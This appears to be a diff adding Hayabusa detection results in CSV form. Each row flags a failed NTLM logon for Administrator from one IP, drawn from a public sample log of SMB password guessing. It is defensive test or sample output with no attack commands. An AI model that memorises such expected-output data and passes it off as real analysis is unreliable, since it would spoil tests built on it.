+2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJcrTyBPuX0TcvOT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kwuZIQAL3BmJnPsJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lxgAfsnH6YWLRD0a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ttBOjzmEBjr9W2QW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FPDKGGYkJQeWgtUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nSoJWqS6YPbpCiBf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pr2oMzxv7pcDfsgw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jiopmZAMpwg3dEaA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tG1Bxm0lt3vwoO5V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Kf5AaQX7KOVAIAN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FW9nBirBTHIXIrfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S9qKcDhfcf2kMk00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9NgStzf2xQ4P7q0d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9mCrjQykX06IcMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7S0QccvEhetekdDP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n1OnibuatFHwDeLz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O8u26bKzFOw12m0T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WEEtOj6BOkI7MPY1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EiCpuqll36DojD3e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p9zjo9ZsSVLZcrsr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KKDD0O5flEsIEDRZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jdPMREVdBEJ50ELC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p7YwRYYCnsr2v08C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nWyAzzpmxUm2CXE9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9RNqhxyUBjUIic0n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1JERyz3mOBZt2jki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V0i93RW5AOsIKKMU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U3XEu06vE68O900O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0fxeGE2jXOnoJttj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Wdg3l6IFHTdh09j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XLVQRnkUd3bfgvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rHjqFQwqpCJFI6qP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L5pEWq2mYsFpFLbb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HSFKJXTC2wlyw0gu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vh5igCJpAA5rmqzV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5NzLlJWkfXDcm64c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i9sR1QHgZ4oaa82F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pq1GWcKzSHSP28hk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: agCtM0s62zXPop0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dVvglj7RtxrBUeXi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pMbS0sIpbFDqJvMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldO0cAZ54BRHHDyz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OmJH2QWFPiYarKh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5fCiyHtI0OTo8pBO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e3vkVuU43tsYHUSj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3w21sFOu2u7FTDZM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bk7eaqQNK1CEgqoj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rv5joLgkm3QUYPyb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4l15usDM7jggwEyw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p9QpOvgDmiOgzQqb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dqyr8tb9TrO1aJNe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hI1bzjixP8eOdDbw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pMTAp20wXS3d1OCk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qrQGfxInmlgPqGtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZcsMMQbsnUdyLJWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8oRYZqBBsq9GyApI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0TAhib6p8fY5iOgI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FerGHj9abOe6ehZn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kN4B4KLpXbyKZzGv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HJtoyRfP38T3KToO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rkI5hLApUWhGnKIs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZCPSO4JLjMur2Eow  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHmrv2xFuq7TyIQN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8SqYq3msNfFh24lg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YE0a2Bypzc1MMdGn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ojgIg88VK6hB72PI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ehLrf2GoAhY3Rf7Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ccfgpjwpis15B4gY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vysSf3DsOxQf5fVd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IEp88cEeiNw4IQsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5PXDJPzw0gPdlCiH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mwoe9IgWx2UZ7Iuu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
